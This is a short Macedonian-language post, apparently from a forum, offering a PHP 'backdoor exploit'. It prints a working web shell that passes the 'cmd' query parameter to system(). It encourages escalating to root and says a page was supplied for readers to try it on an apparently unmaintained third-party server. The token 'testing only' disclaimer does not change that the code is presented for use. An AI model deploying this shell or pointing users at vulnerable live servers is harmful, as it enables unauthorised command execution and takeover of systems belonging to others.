server backdoor exploit

eve vi eden exploit napraven vo php. neznam vo koj del e dupkata, dali e vo prelistuvacite koi vrakaat informacii koi ne treba da bidat vrateni ili vo samata system() funkcija vo php koja pri nejzino koristenje moze da se podigne shell od sistemot i da se napise bilo koja komanda. Problemot e sto dokolku imete user na host server, so koristenje na ovoj kod dobivate samo permisii za vasiot user, znaci nemate root permisii, no dokolku ste dobar bash skripter i znaete da napisete nekoj kod koj bi vi ovozmosil root permisii , serverot e vas )

eve go kodot, use it only for testing ( on your machine )
ne odgovaram za posledicite

<?php
echo "<form action=".$_SERVER['PHP_SELF'].">";
echo '<input type="text" name="cmd">';
echo "</form>";

if(isset($_GET['cmd'])){
echo "<pre>";
$cmd = ($_GET['cmd']);
system($cmd);
echo "</pre>";

}

?>

zaboraviv da vi ja dadam strana kolku samo da probate...tuka

probav momcite da gi kontaktiram i da im kazam da ja soshijat dupkata odnosno da ja isklucat system() funkcijata no nisto ne se sluci, izgleda serverot veke nikoj ne go odrzava a so toa znaci nema ni admini.